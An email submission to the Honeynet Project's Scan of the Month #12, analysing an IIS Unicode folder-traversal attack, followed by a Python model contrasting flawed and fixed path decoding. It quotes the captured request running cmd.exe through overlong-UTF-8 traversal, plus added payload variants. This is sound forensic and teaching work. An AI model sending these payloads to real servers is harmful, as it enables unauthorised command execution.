From gfk@logidac.com Wed Feb 14 19:11:42 2001
Date: Mon, 29 Jan 2001 21:43:53 -0500
From: Guillaume Filion
To: project@honeynet.org
Subject: Scan of the month
Hi guys,
Here's my try at the forensics and analysis of the Scan of the Month
#12. It's my first try at this kind of thing, so excuse my
mistakes... Usually, the scans of the month are way over my head, but
this one looked easier, so I gave it a try.
### QUESTION 1: What is the operating system of the honeypot, how do you know?
The attacker thinks that it's WinNT (it's a WinNT attack) running
IIS/ASP (the cookie name is ASPSessionID*).
Since the attack worked, I guess the attacker was right... 8)
The answer from the honeypot server says: Server: Microsoft-IIS/4.0
Passive TCP/IP Fingerprinting shows:
TTL: 128 DF is on. Win: 0x2238 -> 8760 TOS: 0x0
The DB (http://project.honeynet.org/papers/finger/traces.txt) shows
(OS, platform, TTL, window size, DF, TOS):
Windows 9x/NT   Intel   32    5000-9000     y   0
Windows 9x/NT   Intel   128   5000-9000     y   0
Windows 2000    Intel   128   17000-18000   y   0
Every piece of info except DF looks like WinNT 4.0.
### QUESTION 2: What is the name of this attack?
I think that M$ calls it "Web Server Folder Traversal" or "File
permission canonicalization".
### QUESTION 3: What is the attack attempting to accomplish?
It tries to execute the command "dir c:\".
That is, having the server send the attacker the contents of the C
drive's \ directory.
### QUESTION 4: How does the attack work?
Here's a post from "rain forest puppy" relating to the vulnerability:
http://packetstorm.securify.com/0010-exploits/iis-unicode.txt
I found a nice summary in a Vuln-Dev archive; strangely, it's not
available anymore at securityfocus' archive.
http://archives.neohapsis.com/archives/vuln-dev/2000-q4/0255.html
To summarise the summary, it tries to make the server execute the
command "dir c:".
However, just sending
GET /../../winnt/system32/cmd.exe?/c+dir+c:\
would not work because IIS blocks "../" if it is directed outside
of the server scope. Someone clever found out that sending the
Unicode for slash / (0xC0 0xAF) does not get caught by IIS. That
way, the attacker is able to snoop around just about everywhere on
the server.
BTW, here is the request sent by the attacker:
GET /msadc/....../....../....../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)
Host: lab.wiretrip.net
Connection: Keep-Alive
Cookie: ASPSESSIONIDGQQQQQZU=KNOHMOJAKPFOPHMLAPNIFIFB
What is funny is that if you go to lab.wiretrip.net, you see that the
site is called "rain forest puppy", which is the name of the guy who
signed one of the posts I was talking about and also reported the
vulnerability to Microsoft. You guys are funny!
### Bonus Question: Is it possible to gain remote control of the
system using this technique? If so, how?
As Bill Clinton's Attorneys would say, "This depends on your
definition of 'remote control of the system'." ;-)
However, as stated in Microsoft's advisory
(http://www.microsoft.com/technet/Security/Bulletin/ms00-078.asp),
"The vulnerability could potentially allow a visitor to a web site to
take a wide range of destructive actions against it, including
running programs on it." So I guess this fits in the definition of
"remote control of the system."
Best,
GFK's
--
Guillaume Filion
Logidac Tech., Beaumont, Québec, Canada - http://logidac.com/
PGP Fingerprint: 14A6 720A F7BA 6C87 2331 33FD 467E 9198 3DED D5CA
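To make the decoding flaw from Question 4 concrete, here is an added example (my own code, not Guillaume's submission, not Honeynet's and not anything from IIS or Microsoft). It models the ordering bug: the web server percent-decodes the request, runs its "../" check on the result, and only at file-system access time does a lenient UTF-8 decoder turn the overlong two-byte form 0xC0 0xAF into a real "/". The sample request lines are constructed by me: the first reproduces the path of the captured request with the two raw bytes written percent-encoded so the file stays printable; the %c1%9c (overlong "\") and %e0%80%af (three-byte overlong "/") variants are extra cases I added, not taken from the submission. The two "server" functions are a simplified model of that check-before-decode ordering and of a fix that canonicalises first and rejects overlong forms, not IIS's actual code.

```python
"""Model of the IIS "Web Server Folder Traversal" decoding flaw (MS00-078).

A traversal check that runs before lenient UTF-8 decoding never sees the
".." segments, because "..\xc0\xaf.." is one odd-looking filename to it;
the later decoding step then turns 0xC0 0xAF into "/" and the path escapes
the web root. Added example, not code from the original submission.
"""
from urllib.parse import unquote_to_bytes

# Constructed sample request lines. [0] mirrors the captured request from the
# submission (raw 0xC0 0xAF bytes written as %c0%af); [2] and [3] are variants
# I added to show other overlong encodings of the path separators.
SAMPLE_REQUESTS = [
    "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.1",
    "GET /../../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.1",
    "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0",
    "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0",
    "GET /msadc/index.html HTTP/1.1",
    "GET /images/a%2fb.gif HTTP/1.1",
]


def fold_overlong_utf8(data: bytes) -> bytes:
    """Decode the way a lenient UTF-8 decoder does: any 2- or 3-byte sequence
    whose value is below 0x80 (an "overlong" encoding, forbidden by RFC 3629)
    is collapsed to that single ASCII byte. All other bytes pass through."""
    out = bytearray()
    i, n = 0, len(data)
    while i < n:
        b0 = data[i]
        if 0xC0 <= b0 <= 0xDF and i + 1 < n and 0x80 <= data[i + 1] <= 0xBF:
            cp = ((b0 & 0x1F) << 6) | (data[i + 1] & 0x3F)
            if cp < 0x80:                      # e.g. C0 AF -> '/', C1 9C -> '\'
                out.append(cp)
                i += 2
                continue
        elif (0xE0 <= b0 <= 0xEF and i + 2 < n
              and all(0x80 <= data[i + k] <= 0xBF for k in (1, 2))):
            cp = ((b0 & 0x0F) << 12) | ((data[i + 1] & 0x3F) << 6) | (data[i + 2] & 0x3F)
            if cp < 0x80:                      # e.g. E0 80 AF -> '/'
                out.append(cp)
                i += 3
                continue
        out.append(b0)                         # normal byte or valid multibyte char
        i += 1
    return bytes(out)


def escapes_web_root(path: bytes) -> bool:
    """Walk the path segments, treating '/' and '\\' alike as separators (as IIS
    does), and report whether a '..' ever climbs above the web root."""
    depth = 0
    for seg in path.replace(b"\\", b"/").split(b"/"):
        if seg == b"..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in (b"", b"."):
            depth += 1
    return False


def request_path(request_line: str) -> str:
    """Extract the path from 'METHOD /path?query HTTP/x.y', dropping the query."""
    _method, target, *_ = request_line.split(" ")
    return target.split("?", 1)[0]


def vulnerable_server(request_line: str) -> tuple:
    """Flawed ordering: percent-decode, run the traversal check, and only then
    (at file access time) apply the lenient UTF-8 decoding.
    Returns ("blocked", b"") or ("served", <path actually opened>)."""
    raw = unquote_to_bytes(request_path(request_line))
    if escapes_web_root(raw):                  # sees "..\xc0\xaf.." as one segment
        return ("blocked", b"")
    return ("served", fold_overlong_utf8(raw))  # now the '/' appears


def hardened_server(request_line: str) -> tuple:
    """Fixed ordering: canonicalise fully first, reject any overlong sequence
    outright, and run the traversal check on the canonical form."""
    raw = unquote_to_bytes(request_path(request_line))
    canonical = fold_overlong_utf8(raw)
    if canonical != raw or escapes_web_root(canonical):
        return ("blocked", b"")
    return ("served", canonical)


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        v_status, v_path = vulnerable_server(line)
        h_status, _ = hardened_server(line)
        escaped = v_status == "served" and escapes_web_root(v_path)
        print(f"{request_path(line):48}  flawed={v_status:7}  fixed={h_status:7}"
              f"  escaped_root={escaped}")
```

Running it shows the plain "/../../" request blocked by both servers, the %c0%af request from the capture served by the flawed server as "/msadc/../../../../../../winnt/system32/cmd.exe" (a path that escapes the web root) and blocked by the fixed one, while ordinary percent-encoding such as "a%2fb.gif" is served by both. The fix is the usual rule: decode and canonicalise before any security check, and reject overlong UTF-8 rather than tolerating it.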